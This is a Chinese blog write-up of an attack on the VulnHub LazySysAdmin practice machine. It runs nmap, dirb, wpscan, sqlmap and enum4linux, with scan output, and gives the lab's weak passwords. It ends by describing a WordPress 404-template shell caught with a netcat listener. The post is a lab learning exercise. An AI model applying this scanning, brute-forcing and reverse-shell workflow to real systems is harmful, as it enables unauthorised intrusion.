渗透测试系列 — VulnHub–LazySysAdmin

正文:

也是一个wordpress
作者的教程
这个文件无需配置网络,直接nat即可用
1.nmap一下,得到ip          192.168.244.132
2.
作者的教程里给的
netdiscover -i wlo1
masscan 192.168.0.100 -p 1-10000 –rate=1000
nmap -T4 -A -v 192.168.0.100 -p 0-10000
对比可发现masscan扫描端口的速度比nmap快很多,但是想要知道端口所运行服务的具体信息,就要用到nmap了
3.
自己是直接这样的,可以一直用的一个命令
nmap -A -p1-65535 192.168.244.132
Apache httpd 2.4.7 ((Ubuntu))

22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd

4.
dirb http://192.168.244.132

==> DIRECTORY: http://192.168.244.132/old/
==> DIRECTORY: http://192.168.244.132/phpmyadmin/
+ http://192.168.244.132/robots.txt (CODE:200|SIZE:92)
+ http://192.168.244.132/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.244.132/test/
==> DIRECTORY: http://192.168.244.132/wordpress/
==> DIRECTORY: http://192.168.244.132/wp/

5.发现是wordpress
wordpress用法
wpscan http://192.168.244.132/wordpress
wpscan -u 192.168.1.128/wordpress -e u vp   得到
| Id | Login | Name |
+—-+——-+———+
| 1 | admin | Admin – |
wpscan -u 192.168.244.132 -e u –wordlist mima.txt   (就不爆破了,继续)
6.
可以像上篇那样试下sqlmap
sqlmap -u “http://192.168.244.132/wordpress/wp-login.php” –form –level 3 –batch
没有跑出来
7.
作者给了enum4linux 192.168.244.132
但是enum4linux(它可以收集Windows系统的大量信息,如用户名列表、主机列表、共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等。该工具主要是针对Windows NT/2000/XP/2003,在Windows 7/10系统,部分功能受限)
还在看作者有什么深意
8.
dirb http://192.168.244.132/
找到http://192.168.244.132/wordpress/wp-includes/
存在目录遍历漏洞,但是没有什么可以利用的文件
9.
还有phpadmin,密码根据教程是较复杂的,就不爆破了
burpsuite抓包,或者专门的工具
应该可以找版本漏洞,再分析下,但是好像都要登陆进去
10.
在页面得到用户名togie,可以爆破ssh,登陆上去提权
密码是12345
可以登陆
11.
或者,作者得到了wordpress的后台账号和密码
登陆进去404得shell,或者zip得shell
12.
改好404后
nc -lvnp 8888
访问http://192.168.244.132/wordpress/?p=2
得到shell
后续一样

后文:

作者怎么net到共享文件的,我还没有看懂
最后作者得到的   账号:Admin 密码:TogieMYSQL12345^^
 
2018.6.25

发表评论

电子邮件地址不会被公开。 必填项已用*标注